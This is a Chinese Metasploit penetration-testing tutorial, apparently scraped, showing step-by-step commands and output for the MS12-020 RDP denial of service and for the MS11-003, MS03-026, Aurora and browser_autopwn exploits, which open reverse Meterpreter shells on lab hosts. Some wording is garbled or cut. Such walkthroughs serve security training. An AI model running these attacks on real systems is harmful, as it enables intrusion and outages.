Microsoft Windows XP;
Microsoft Windows Vista;
Microsoft Windows Server 2008;
Microsoft Windows Server 2003;
Microsoft Windows 7。
演示在Windows XP SP1上利用该漏洞实施渗透攻击。其中,目标主机的IP地址为192.168.1.106。具体操作步骤如下:
Matching Modules
================
Name Disclosure Date Rank Check Deion
————– ————— —– ———————
auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2019-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
从输出的信息中可以看到,已搜索到两个可用于利用该漏洞的攻击模块。其中,第一个攻击模块可使目标造成拒绝服务攻击,第二个漏洞仅用于扫描检测。所以,这里选择第一个攻击模块实施渗透攻击。
2)选择渗透攻击模块,并查看该模块的配置选项参数。具体如下:
msf5 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(ms12_020_maxchannelids) > show options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Deion
—- ————— ——– ————–
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)
从输出的信息中可以看到,该模块有两个配置选项参数。默认已经配置了目标端口,所以接下来配置RHOST选项来指定目标即可。
3)为dos/windows/rdp/ms12_020_maxchannelids模块配置选项参数。执行命令如下:
msf5 auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.106
RHOST => 192.168.1.106
4)实施渗透攻击。执行命令如下:
msf5 auxiliary(ms12_020_maxchannelids) > exploit
[*] 192.168.1.106:3389 – Sending MS12-020 Microsoft Remote Desktop
Use-After-Free DoS
[*] 192.168.1.106:3389 – 210 bytes sent
[*] 192.168.1.106:3389 – Checking RDP status…
[+] 192.168.1.106:3389 seems down
[*] Auxiliary module execution completed
从输出的信息中可以看到,已成功对目标主机发起攻击。此时将会看到目标主机出现蓝屏,并且会自动重新启动系统,如图1所示。
图1 目标主机出现蓝屏
5)看到目标主机出现蓝屏现象,表示已成功对目标实施了拒绝服务攻击。
利用MS11-003漏洞对目标主机Windows 7实施渗透攻击。具体操作步骤如下:
1)查看针对MS11-003漏洞模块的完整路径。执行命令如下:
msf5 > search MS11-003
Matching Modules
================
Name Disclosure Date Rank Check Deion
——- ————— —- —– ————-
exploit 2019-11-29 good No MS11-003 Microsoft Internet /windows/browser/ Explorer CSS Recursive Import ms11_003_ie_css_import Use After Free
从输出信息中可以看到,利用MS11-003漏洞实施攻击的模块名称为windows/browser/ms11_003_ie_css_import。
2)使用windows/browser/ms11_003_ie_css_import模块实施渗透攻击,并且查看该模块的选项参数。执行命令如下:
msf5 > use exploit/windows/browser/ms11_003_ie_css_import
msf5 exploit(ms11_003_ie_css_import) > show options
Module options (exploit/windows/browser/ms11_003_ie_css_import):
Name Current Setting Required Deion
—– ———— ——— ————
OBFUSCATE true no Enable Java obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
Exploit target:
Id Name
— —————–
0 Automatic
从输出的信息中可以看到所有的配置选项参数。接下来,配置SRVHOST选项来指定监听地址。
3)配置选项参数SRVHOST。执行命令如下:
msf5 exploit(ms11_003_ie_css_import) > set SRVHOST 192.168.1.105
SRVHOST => 192.168.1.105
4)实施攻击。执行命令如下:
msf5 exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.105:4444
[*] Using URL: http://192.168.1.105:8080/uvCjRD
[*] Server started.
看到以上输出信息,说明已成功启动了渗透攻击。接下来,只要使目标主机在浏览器中访问http://192.168.1.105:8080/uvCjRD 址,目标主机即会被攻击,其将自动与攻击主机建立Meterpreter会话连接。具体如下:
msf5 exploit(ms11_003_ie_css_import) > [*] Received request for “/uvCjRD”
[*] Sending redirect
[*] Received request for “/uvCjRD/BTbkA6a.html”
[*] Sending HTML
[*] Sending .NET DLL
[*] Received request for “/uvCjRD/xEEx80xA0xE1x81x9AxEEx80xA0xE1x81x9AxEEx80xA0xE1x81x9AxEEx80xA0xE1x81x9A”
[*] Sending CSS
[*] Meterpreter session 1 opened (192.168.1.105:4444 -> 192.168.1.103:50047) at 2019-05-07 14:01:01 +0800
[*] Session ID 1 (192.168.1.105:4444 -> 192.168.1.103:50047) processing InitialAutoRun ‘migrate -f’
[*] Current server process: iexplore.exe (5704)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4880
[*] Received request for “/uvCjRD/BTbkA6a.html”
[*] Sending HTML
[*] Sending .NET DLL
[+] Successfully migrated to process
[*] Meterpreter session 2 opened (192.168.1.105:4444 -> 192.168.1.103:50051) at 2019-05-07 14:01:12 +0800
[*] Session ID 2 (192.168.1.105:4444 -> 192.168.1.103:50051) processing InitialAutoRun ‘migrate -f’
[*] Current server process: iexplore.exe (5740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6052
[*] Sending .NET DLL
[+] Successfully migrated to process
[*] Meterpreter session 3 opened (192.168.1.105:4444 -> 192.168.1.103:50053) at 2019-05-07 14:01:21 +0800
[*] Session ID 3 (192.168.1.105:4444 -> 192.168.1.103:50053) processing InitialAutoRun ‘migrate -f’
[*] Current server process: iexplore.exe (1888)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4180
[+] Successfully migrated to process
从输出的信息中可以看到,攻击主机与目标主机之间成功建立了3个Meterpreter会话。为了确认是否成功建立了这3个会话,可以执行sessions命令查看:
msf5 exploit(ms11_003_ie_css_import) > sessions
Active sessions
===============
Id Type Information Connection
— —— ————- ————-
1 meterpreterx86/win32 WIN-RKPKQFBLG6CAdministrator @ WIN-RKPKQFBLG6C 192.168.1.105:4444 -> 192.168.1.103:50047 (192.168.1.103)
2 meterpreterx86/win32 WIN-RKPKQFBLG6CAdministrator @ WIN-RKPKQFBLG6C 192.168.1.105:4444 -> 192.168.1.103:50051 (192.168.1.103)
3 meterpreterx86/win32 WIN-RKPKQFBLG6CAdministrator @ WIN-RKPKQFBLG6C 192.168.1.105:4444 -> 192.168.1.103:50053 (192.168.1.103)
从输出的信息中可以看到成功建立的会话。此时,用户使用sessions-i选项可以激活任意一个会话,然后进一步对目标主机渗透攻击。例如,激活第一个会话,执行命令如下:
msf5 exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >
从命令行提示符meterpreter>可以看到,成功打开了第一个Meterpreter会话。这时即可运行Meterpreter终端下的所有命令或脚本。例如,查看系统运行的平台,具体如下:
meterpreter > sysinfo
Computer : WIN-RKPKQFBLG6C #计算机名称
OS : Windows 7 (Build 7601, Service Pack 1). #操作系统类型
Architecture : x86 #架构
System Language : zh_CN #系统语言
Domain : WORKGROUP #域名
Logged On Users : 4 #登录用户数
Meterpreter : x86/win32
从输出的信息中可以看到目标主机的计算机名称、操作系统版本、架构和语言等信息。
MS03-026漏洞,即Microsoft DCOM RPC接口长主机名远程缓冲区溢出漏洞。攻击者可以远程通过访问目标服务器的RPC服务端口无须验证就能利用漏洞,以系统权限执行任意指令,实现对系统的完全控制。下面介绍利用该漏洞对目标主机实施渗透攻击的方法。
演示利用MS03-026漏洞对目标主机Windows 2000 SP4实施渗透攻击。具体操作步骤如下:
Matching Modules
================
Name Disclosure Date Rank Check Deion
———— —————- —- —— ———–
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow
2)使用windows/dcerpc/ms03_026_dcom渗透攻击模块,并查看该模块的配置选项参数。执行命令如下:
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
msf5 exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Deion
—— —————- ——— ————-
RHOSTS yes The target address range or CIDR identifier
RPORT 135 yes The target port (TCP)
Exploit target:
Id Name
— —————————————————————–
0 Windows NT SP3-6a/2000/XP/2003 Universal
从输出的信息中可以看到,需要配置一个目标地址选项。
3)配置RHOST选项。执行命令如下:
msf5 exploit(ms03_026_dcom) > set RHOSTS 192.168.1.103
RHOST => 192.168.1.103
4)启动渗透攻击。执行命令如下:
msf5 exploit(ms03_026_dcom) > exploit
[*] Started reverse TCP handler on 192.168.1.108:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.103[135] …
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.103[135] …
[*] Sending exploit …
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.103:1029) at 2017-05-07 17:43:27 +0800
meterpreter >
从输出的信息中可以看到,成功建立了一个Meterpreter会话,由此说明对目标主机攻击成功。
4、IE浏览器的激光漏洞利用
渗透测试者可以利用激光漏洞在目标主机上进行 页挂马,进而达到对目标主机的攻击。在IE 6/7/8中都存在激光漏洞,涉及的操作系统包括Windows 2000 SP4、Windows XP/2003/Vista/2008和Windows 7。下面介绍激光漏洞的利用方法。
演示利用IE浏览器的激光漏洞,对目标主机(Windows XP)实施渗透攻击。执行命令如下:
1)选择可利用激光漏洞的渗透攻击模块,即windows/browser/ms10_002_aurora模块。执行命令如下:
msf5 > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
2)选择攻击载荷,并查看模块的配置选项参数。执行命令如下:
msf5 exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Deion
—– —————- ——— ————-
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Deion
—– ————— ——— ————-
EXITFUNC process yes Exit technique (Accepted: ”, seh,thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Automatic
根据以上输出信息,配置需要的选项参数。
3)配置选项参数。执行命令如下:
msf5 exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf5 exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf5 exploit(ms10_002_aurora) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf5 exploit(ms10_002_aurora) > set LPORT 443
LPROT => 443
4)启动渗透攻击。执行命令如下:
msf5 exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.108:443
msf5 exploit(ms10_002_aurora) > [*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.108:80/
[*] Server started.
看到以上输出信息,则表示已成功启动了攻击。此时,只要在目标主机上使用IE浏览器访问http://192.168.1.108:80/,即可攻击目标。攻击成功后,将显示如下信息:
[*] 192.168.1.106 ms10_002_aurora – Sending MS10-002 Microsoft Internet
Explorer “Aurora” Memory Corruption
[*] Meterpreter session 1 opened (192.168.1.108:443 -> 192.168.1.106:1175) at 2019-05-07 14:10:42 +0800
从输出的信息中可以看到,成功打开了一个Meterpreter会话,可以看到目标主机的内存消耗非常严重,如图2所示。
图2 内存使用情况
5)此时可以通过迁移进程,使目标主机的内存消耗恢复正常。执行命令如下:
meterpreter > run migrate -f
[*] Current server process: iexplore.exe (420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 888
[+] Successfully migrated to process
从输出的信息中可以看到,已经成功迁移了进程。这时候会发现目标主机的IE关了,而且内存消耗也正常了。
5、浏览器自动攻击模块
在Metasploit中提供了一个浏览器自动攻击模块browser_autopwn。当用户访问Web页面时,该模块将自动攻击目标主机的浏览器。在实施渗透攻击之前,broswer_autopwn模块能够检测到用户使用的浏览器类型。也就是说,该模块只针对IE浏览器攻击。然后,broswer_autopwn将根据浏览器的检测结果,自行部署最合适的exploit。下面介绍利用broswer_autopwn模块实施浏览器自动攻击的方法。
利用broswer_autopwn模块对目标主机(Windows XP IE6)实施浏览器自动攻击。具体操作步骤如下:
1)搜索broswer_autopwn模块的完整路径。执行命令如下:
msf5 > search autopwn
Matching Modules
================
Name Disclosure Date Rank Check Deion
——— —————- —- —– ———–
auxiliary/server/browser_autopwn normal No HTTP Client Automatic Exploiter
auxiliary/server/browser_autopwn2 2019-07-05 normal No HTTP Client Automatic Exploiter 2 (Browser Autopwn)
从输出的信息中可以看到broswer_autopwn模块的完整路径,而且从描述中可以看到该模块用于HTTP客户端(即浏览器)自动利用。
2)选择攻击模块,并加载攻击载荷。执行命令如下:
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
3)查看并配置模块的选项参数。执行命令如下:
msf5 auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Deion
—– ————— ——— ————-
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Deion
—- —————-
WebServer Start a bunch of modules and direct clients to appropriate
exploits
msf5 auxiliary(browser_autopwn) > set LHOST 192.168.1.108 #设置攻击主机的地址
LHOST => 192.168.1.108
msf5 auxiliary(browser_autopwn) > set URIPATH / #设置exploit的URI路径
URIPATH => /
在以上过程中,配置了LHOST和URIPATH参数。
4)启动渗透攻击。执行命令如下:
msf5 auxiliary(browser_autopwn) > exploit
当启动渗透攻击后,将会输出大量信息。具体如下:
[*] Auxiliary module execution completed
[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.108…
[*] —
[*] Starting exploit android/browser/webview_addjavainterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/gCMrIGi
[*] Local IP: http://192.168.1.108:8080/gCMrIGi
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JnJExAKYwwPAw
[*] Local IP: http://192.168.1.108:8080/JnJExAKYwwPAw
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/mTpzYbu
[*] Local IP: http://192.168.1.108:8080/mTpzYbu
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload
generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/oKZGDjanNKjIG
[*] Local IP: http://192.168.1.108:8080/oKZGDjanNKjIG
[*] Server started.
…
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.108:6666
[*] Started reverse TCP handler on 192.168.1.108:7777
[*] Starting the payload handler…
[*] Starting the payload handler…
限于篇幅,中间部分内容省略了。在最后看到以下信息后,则表示渗透攻击启动完成。具体如下:
[*] — Done, found 20 exploit modules
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.108:8080/
[*] Server started.
从输出的信息中可以看到,Metasploit模仿了一个 站, 站地址为http://192.168.1.108:8080/。此时,当用户访问该 址时,broswer_autopwn模块尝试连接用户的主机,并试图建立远程会话。具体如下:
[*] 192.168.1.109 java_jre17_jmxbean – handling request for /cSihqoYuL/MHeldoAg.jar
[*] 192.168.1.109 java_atomicreferencearray – Sending jar
[*] Meterpreter session 1 opened (192.168.1.108:7777 -> 192.168.1.109:1088) at 2019-05-07 15:47:31 +0800
*] Sending stage (45718 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.108:7777 -> 192.168.1.109:1093) at 2019-05-07 15:47:31 +0800
[*] Session ID 1 (192.168.1.108:7777 -> 192.168.1.109:1088) processing
InitialAutoRun ‘migrate -f’
[*] 192.168.1.109 java_jre17_jmxbean – handling request for /cSihqoYuL/MHeldoAg.jar
[*] Session ID 2 (192.168.1.108:7777 -> 192.168.1.109:1093) processing InitialAutoRun ‘migrate -f’
[*] Sending stage (45718 bytes) to 192.168.1.109
…
[*] Session ID 4 (192.168.1.108:7777 -> 192.168.1.109:1112) processing InitialAutoRun ‘migrate -f’
[*] Session ID 5 (192.168.1.108:3333 -> 192.168.1.109:1115) processing InitialAutoRun ‘migrate -f’
[*] Meterpreter session 6 opened (192.168.1.108:3333 -> 192.168.1.109:1121) at 2019-05-07 15:47:41 +0800
[*] Current server process: efgtslDysTpBSDF.exe (2512)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3092
[*] Sending stage (45718 bytes) to 192.168.1.109
[*] Meterpreter session 7 opened (192.168.1.108:7777 -> 192.168.1.109:1132) at 2019-05-07 15:47:43 +0800
[*] Session ID 6 (192.168.1.108:3333 -> 192.168.1.109:1121) processing InitialAutoRun ‘migrate -f’
[*] Session ID 7 (192.168.1.108:7777 -> 192.168.1.109:1132) processing
InitialAutoRun ‘migrate -f’ [*] Current server process: oMmhXajpVLwu.exe (2636)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3208
[+] Successfully migrated to process
[+] Successfully migrated to process
从以上输出信息中可以看到,browser_autopwn模块尝试与目标主机建立远程连接的过程。最后一行信息表示已成功迁移了进程。接下来,使用sessions命令查看或激活Meterpreter会话,具体如下:
msf5 auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
— ——– ———- —————–
1 meterpreter java/java Test @ aa-886okjm26fsw 192.168.1.108:7777 ->192.168.1.109:1088 (192.168.1.109)
2 meterpreter java/java Test @ aa-886okjm26fsw 192.168.1.108:7777 ->192.168.1.109:1093 (192.168.1.109)
3 meterpreter java/java Test @ aa-886okjm26fsw 192.168.1.108:7777 ->192.168.1.109:1104 (192.168.1.109)
4 meterpreter java/java Test @ aa-886okjm26fsw 192.168.1.108:7777 ->192.168.1.109:1112 (192.168.1.109)
5 meterpreter x86/win32 AA-886OKJM26FSWTest @ AA-886OKJM26FSW 192.168.1.108:3333 -> 192.168.1.109:1115 (192.168.1.109)
6 meterpreter x86/win32 AA-886OKJM26FSWTest @ AA-886OKJM26FSW 192.168.1.108:3333 -> 192.168.1.109:1121 (192.168.1.109)
7 meterpreter java/java Test @ aa-886okjm26fsw 192.168.1.108:7777 ->
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!